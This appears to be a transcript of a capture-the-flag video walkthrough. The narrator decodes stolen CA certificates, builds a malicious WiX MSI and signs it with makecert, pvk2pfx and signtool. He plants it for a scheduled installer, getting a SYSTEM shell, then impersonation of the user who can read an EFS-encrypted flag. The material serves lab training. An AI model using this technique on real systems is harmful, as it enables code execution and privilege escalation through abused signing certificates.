note.txt, it says, please drop MSIs that need testing into this folder. I will review regularly. Certs have been added to the store already. So based upon that note, it sounds like we have to create a malicious MSI, which is a Windows installer, and sign it with the certificates that are in the certs directory. So let's do that. So go up to your directories, go into certs. I think we can do OpenSSL-encode. Is this a thing? OpenSSL base 64 encode myca.sir. OpenSSL base 64 in myca.sir. C:\\progra2. I should really update my path. There's v1. Really sucks not having error messages. Base 64 and myca.cer. There we go. So we got the first cert. So we can cd, we'll make dir smb v myca.cer.b64, paste, base64-d .cer. Okay. And we can do the next one, which is myca.pvk. It's a bit bigger. Copy. V. myca.pvk. base64-d. Okay, so now we got those two certs. We have to create a malicious MSI package. So let's go over back to Windows. And we have to download and install Wix, which is going to allow us to create MSIs. And we also have to download the Windows 10 SDK, which will allow us to sign this. So if we download Wix, let's do Wix binaries, save, and Windows 10 SDK. So we can download the installer, see view downloads. Still downloading Wix, or scanning Wix. You must install the Windows Software Development Kit before you can install the latest. So we probably already have the SDK installed on this machine. So I gotta find make cert, which stands for make certificate. We can open Wix and copy this to a folder. Select everything, copy it in here. Okay. And then if we Googled around for like creating a malicious MSI file, we'd come across an article by xpnsec. So let's see. Here we go. And this has a good template. So if we copy his Wix, go into Wix, new just do notepad, paste. So he's running PowerShell, and we don't want to do that. We want to do cmd/c. Hold on, there's a few things here. So property ID cmd line, exec command cmd line. So I think that's a variable to this. So let's test this with echo cmd/c echo test to c : users ipsec ethereal test. So let's just save that like this. C : users ipsec desktop wix dot test.wix, I guess we'll do. Save. And now we have to execute the Wix. So does he have instructions to do that here? Let's see. Candle exe dot wix and then light. So cmd cd desktop cd wix. Or we can probably just do wix/candle test and then light test.wix object, or wix/light test wix object. Cannot find the file example.exe, so I'm guessing he was embedding example.exe somewhere. Example.exe source, let's see. What if we can just take this out? Save. Wix light. If we do dir, we have test.msi on our desktop. So if I run this, the question is, does a directory get created that we put here? Test ethereal test. C : users ipsec. Run this MSI. And we see the command gets executed. So we should be good to create this with the OpenSSL. So go back to our box. And let's see. Where was our shell last? OpenSSL. Do we have cmd.exe? Here we go. So go back here. Oh, really? Is my clipboard deciding not to work? Cd smb v test.txt. Paste. Win10 dev. And we can go to we have to start a file share back up. Takes a second to start up. Should be up. There we go. I don't see test.txt. Where did I put that? It's in SMB, not SSL. Should have just copied it. Okay. There we go. Test.txt. Finally. Copy this. Paste, save, escape. We should be able to candle, and then Wix light. Test.wix object. Create that MSI, and then we have to save it. So let's go where makecert is installed to. Open file location. So we have makecert. We'll also need pvk to pfx and sign tool. Okay, we got everything we want in a directory. So echo path. I'm going to set path is equal to this colon path. So now I can just execute sign tool. Awesome. So we have to copy the two certs onto a desktop. And now we can do make cert. Okay, we do have... Oh. What the heck? The version of make cert's not compatible? Really? That's a load of crap. Let's see. Is this one? This one is. Okay. So that's the one we want. Copy. Put the path in Notepad in case this goes away. Open a new command prompt so I can set my path again. Set path is equal to this. Get rid of these quotes. And we can do make cert. There we go. Okay. Make cert dash n. This will be for what we want to call it. So cn is ethereal. Then we want to do dash pe. This makes the cert exportable. Dash cy is an end entity. If you want to go for any of these arguments, you can do make cert man page and see what all these flags are. So end ic myca cert iv myca pvk sky signature sv ethereal. We'll call this please subscribe. Please subscribe dot pvk. Please subscribe dot cert. Let's see, what did I screw up? Make cert dash n cn ethereal pe cy. Oh, we want IC before myca. That's issuer cert authority or something. There we go. No password. Okay. Yes, do it without password protection. Succeeded. So now we should have the please subscribe certs. So now we can do pvk to bfx to please subscribe dot pvk, then spc. This will be the cert one, and then create the pfx file, please subscribe.pfx, and this lets us sign it. So we can do sign tool sign /vf, please subscribe pfx to the MSI. Okay, the MSI has been signed, so we can copy the MSI back on the box and test this out. So hopefully this all works. If not, well, it's easy to sign the MSIs now, so we just have to play with that one command. So we copied it there. So we will have to kill our OpenSSL shells. And we will direct this to smb test.msi. And on this one, Python ethereal. We can copy this, direct it to c:users public desktop test.msi shortcuts test.msi. Okay, we can kill this, stutter listeners, and then let's get our shell again by copying the shortcut. So cmd copy /y. So we should be able to go to d:\dir cd dev cd MSIs, and then copy c:users public desktop shortcuts test.msi to this directory. It's here. We can kill our shells and start new ones and wait a few minutes and see if this MSI gets installed. And if it does get installed, if we did the creation portion correctly to get the reverse shell. So we never got a shell. So I think the next step is to go back and create a MSI that's a little bit cleaner. So let's go here, go back into our Wix, and instead of doing this complicated command, let's take advantage of something we already put in the box. So c:users public desktop shortcuts please subscribe.lnk. That shortcut we've already placed in the box. That should make this MSI a bit less complicated. Whenever you do all those pipes, things get potentially crazy. So let's do Wix candle test.wix, then Wix light and test.wix object. Okay. And now we just need to sign it. So sign tool, file has been successfully signed. So we can go to our SMB share and put test.msi there. So back on our box, we can do lsla, SMB, it's there. So let's put that here. SMB / test.msi. Okay. Go over to a Python. And we want to copy to test.msi. It's not there. So let's just, do we have any of that program stuff to copy from? Cat cmd. We can copy this. Send this to c:users public desktop oh my god.msi. Forgot shortcuts. Okay, it's there. We've given enough time to get there, so it should be there. So the next thing to do is get a shell, and then we'll copy it. So copy this. And forgot the C. C, copy. Please subscribe.lnk. Over top of that, we should get a shell. I wonder if this box got reverted and my shortcuts disappeared. C:users public desktop shortcuts. Please subscribe.lnk. Over top of that. Try this again. Okay. Just took a while. Well, we got the callback, and something is seriously wrong. There we go. dir. There we go. So d:, cd dev, cd MSIs, copy, c:users public desktop. Forgot slash. Shortcuts test dot it was oh my god.msi. Here. Copy the file. And now we wait for a shell. We got a shell back. We do who am I? We are nt-authority/system. So we go to cd users, then cd administrator, cd desktop. So we want to probably go to Rupal maybe. cd desktop, type root.txt, and we don't get anything. If we do iCackles root.txt, we should be able to read it. Cipher slash, I forget what the slash is. I think it's ciphers root.txt will tell us. Ciphers question mark. Cipher question mark. Cipher root.txt. I'm trying to show how we verify that it's actually encrypted. So there is a flag for the cipher thing that will show the public key of the file. So let's see. Displays information, cipher/c. Oh, we see e root.txt. So we have to be the Rupal user to be able to decrypt this file. We want to do it here. Cipher root.txt. So we see the certificate thumbprint of who can decrypt this file. So this just means we have to do one more time back into our MSI and have us not escalate to system. So we're back on Windows. If we open up test.wix, we have this impersonate option. If we change this to yes, then we will impersonate the user that is running it. So let's save this and see, do we have all this in history? We do. So we can do wix candle test.wix. Let's delete everything here. Then we want to do light. And finally, we need the sign tool. Is that a different command prompt? Here we go. We have signed it. And let's copy it on over. So we'll call this dsc.msi. Copy it to files. And now we just got to get it onto the box. So we can get out of our SSL shells, /smb dsc.msi, and we can copy it with this command. Let's see, dsc.msi. Okay, should be copied. So now comes the time of getting back on the box and doing the final shell. So copy the Visual Studio file. Should get a shell in a few seconds. We did copy it. This always behaves funny right after you copy files. I wonder if something on the back end is wonky. Start a whole new session. Copy. There we go. dir. We're good. Users, public, desktop, shortcuts, and then copy dsc.msi to d:/dev msi's dsc.msi. Okay, get out of our shells, and let's wait for it to hit us. Or wait for the cron job. So we got a shell. If we do who am I, we're now Rupal, no longer system. So cd users Rupal. And if we go into desktop, I guarantee you we can read root.txt, but unfortunately I can't do PowerShell, and I don't have a good way to show root.txt without you being able just to copy and paste it. So, as Rupal, we can read this file. Just take my word for it, and that'll be it for this video. I'm going to do another one on this box with just doing the unintended privesc because, well... Oh, wait. That may have actually worked. PowerShell, what is the way to get file size in PowerShell? Get item root.txt.length. See if this works. Not sure if it will, but anyways, as I was saying, I'm sure you can agree this video went sideways. So the second video on this will be just to the point and showing off a really cool technique. So take care, guys.